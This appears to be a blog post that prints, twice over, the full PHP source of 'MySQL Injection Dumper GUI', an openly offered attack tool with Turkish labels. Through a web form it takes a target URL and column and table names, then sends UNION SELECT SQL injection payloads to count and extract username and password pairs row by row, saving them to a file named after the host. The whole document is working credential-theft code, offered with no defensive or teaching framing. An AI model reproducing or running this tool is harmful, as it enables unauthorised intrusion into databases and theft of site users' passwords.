MySQL Injection Dumper GUI
<?php
#MySQL Injection Dumper GUI
#Coded By Burtay - Ayýn Ðayýn - Þemsul-Hack
#admin@burtay.org
#Burtay.Org
#Megaturks.Net
#Usage Video -> http://vimeo.com/14114247
error_reporting(0);
set_time_limit(0);
class dumper
{
public $regex = '#<burtay>(.*?)</burtay>#si';
public function get($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site);
$calis = curl_exec($curl);
curl_close($curl);
return $calis;
}
public function dump($site,$kolon_sayisi,$etkilenen_kolon,$username,$password,$tablo)
{
$colons = 'concat(0x3c6275727461793e,'.$username.',0x3a,'.$password.',0x3c2f6275727461793e)';
$counts = 'concat(0x3c6275727461793e,count('.$username.'),0x3c2f6275727461793e)';
$colon = null;
$count = null;
for($i=1 ; $i<=$kolon_sayisi ; $i++)
{
if( $kolon_sayisi==1 )
{
$colon = $colons;
$count = $counts;
}
elseif( $i == $etkilenen_kolon )
{
$colon = $colon . ','. $colons;
$count = $count . ','. $counts;
}
elseif( $colon == null )
{
$colon = $i;
$count = $i;
}
else
{
$colon = $colon . ','. $i;
$count = $count . ','. $i;
}
}
$say = $site . "+and+1=0+union+select+".$count."+from+".$tablo."--";
echo $say."<br>";
$kaynak = $this->get($say);
preg_match($this->regex,$kaynak,$toplam);
$this->kaydet($site,$toplam[1]);
ob_flush();
flush();
echo "Toplam <b>". $toplam[1] ."</b> Adet User List Çekilecek<br><br>";
for($k=0; $k<=$toplam[1] ; $k++)
{
$sites = $site . '+and+1=0+union+select+'.$colon.'+from+'.$tablo.'+limit+'.$k.',1--';
$kaynak = $this->get($sites);
preg_match($this->regex,$kaynak,$list);
ob_flush();
flush();
echo $list[1]."<br>";
$this->kaydet($site,$list[1]);
}
echo "<b>Tarama Bitti</b>";
}
public function kaydet($url,$data)
{
$site = parse_url($url);
$site = $site["host"];
$ac = fopen($site.'.txt','ab');
fwrite($ac,$data."\n");
fclose($ac);
}
}
$class = new dumper();
echo
'
<Center>
<b>MySQL Injection Dumper<br>
Coded By Burtay</b><br>
<a href="http://burtay.org">Burtay.Org</a></b><br><br>
<form action="" method="post">
<b>Site<br>
<input type="text" name="site" style="width:400"><br>
Kolon Sayisi<br>
<input type="text" name="max_kolon" style="width:50"><br>
Etkilenen Kolon<br>
<input type="text" name="effected" style="width:50"><br>
Username Kolon Ýsmi<br>
<input type="text" name="username" style="width:150"><br>
Password Kolon ismi<br>
<input type="text" name="password" style="width:150"><br>
Tablo ismi</b><br>
<input type="text" name="tablo" style="width:150"><br>
<input type="submit" value="Dump!">
</Center>
';
if ($_POST["site"] !=="" and $_POST["max_kolon"] !="" and $_POST["tablo"] !="")
{
$site = $_POST["site"];
$max_kolon = $_POST["max_kolon"];
$effected = $_POST["effected"];
$username = $_POST["username"];
$password = $_POST["password"];
$tablo = $_POST["tablo"];
$class->dump($site,$max_kolon,$effected,$username,$password,$tablo);
}
?>
#MySQL Injection Dumper GUI
#Coded By Burtay - Ayýn Ðayýn - Þemsul-Hack
#admin@burtay.org
#Burtay.Org
#Megaturks.Net
#Usage Video -> http://vimeo.com/14114247
error_reporting(0);
set_time_limit(0);
class dumper
{
public $regex = '#<burtay>(.*?)</burtay>#si';
public function get($site)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site);
$calis = curl_exec($curl);
curl_close($curl);
return $calis;
}
public function dump($site,$kolon_sayisi,$etkilenen_kolon,$username,$password,$tablo)
{
$colons = 'concat(0x3c6275727461793e,'.$username.',0x3a,'.$password.',0x3c2f6275727461793e)';
$counts = 'concat(0x3c6275727461793e,count('.$username.'),0x3c2f6275727461793e)';
$colon = null;
$count = null;
for($i=1 ; $i<=$kolon_sayisi ; $i++)
{
if( $kolon_sayisi==1 )
{
$colon = $colons;
$count = $counts;
}
elseif( $i == $etkilenen_kolon )
{
$colon = $colon . ','. $colons;
$count = $count . ','. $counts;
}
elseif( $colon == null )
{
$colon = $i;
$count = $i;
}
else
{
$colon = $colon . ','. $i;
$count = $count . ','. $i;
}
}
$say = $site . "+and+1=0+union+select+".$count."+from+".$tablo."--";
echo $say."<br>";
$kaynak = $this->get($say);
preg_match($this->regex,$kaynak,$toplam);
$this->kaydet($site,$toplam[1]);
ob_flush();
flush();
echo "Toplam <b>". $toplam[1] ."</b> Adet User List Çekilecek<br><br>";
for($k=0; $k<=$toplam[1] ; $k++)
{
$sites = $site . '+and+1=0+union+select+'.$colon.'+from+'.$tablo.'+limit+'.$k.',1--';
$kaynak = $this->get($sites);
preg_match($this->regex,$kaynak,$list);
ob_flush();
flush();
echo $list[1]."<br>";
$this->kaydet($site,$list[1]);
}
echo "<b>Tarama Bitti</b>";
}
public function kaydet($url,$data)
{
$site = parse_url($url);
$site = $site["host"];
$ac = fopen($site.'.txt','ab');
fwrite($ac,$data."\n");
fclose($ac);
}
}
$class = new dumper();
echo
'
<Center>
<b>MySQL Injection Dumper<br>
Coded By Burtay</b><br>
<a href="http://burtay.org">Burtay.Org</a></b><br><br>
<form action="" method="post">
<b>Site<br>
<input type="text" name="site" style="width:400"><br>
Kolon Sayisi<br>
<input type="text" name="max_kolon" style="width:50"><br>
Etkilenen Kolon<br>
<input type="text" name="effected" style="width:50"><br>
Username Kolon Ýsmi<br>
<input type="text" name="username" style="width:150"><br>
Password Kolon ismi<br>
<input type="text" name="password" style="width:150"><br>
Tablo ismi</b><br>
<input type="text" name="tablo" style="width:150"><br>
<input type="submit" value="Dump!">
</Center>
';
if ($_POST["site"] !=="" and $_POST["max_kolon"] !="" and $_POST["tablo"] !="")
{
$site = $_POST["site"];
$max_kolon = $_POST["max_kolon"];
$effected = $_POST["effected"];
$username = $_POST["username"];
$password = $_POST["password"];
$tablo = $_POST["tablo"];
$class->dump($site,$max_kolon,$effected,$username,$password,$tablo);
}
?>
0 comments:
Post a Comment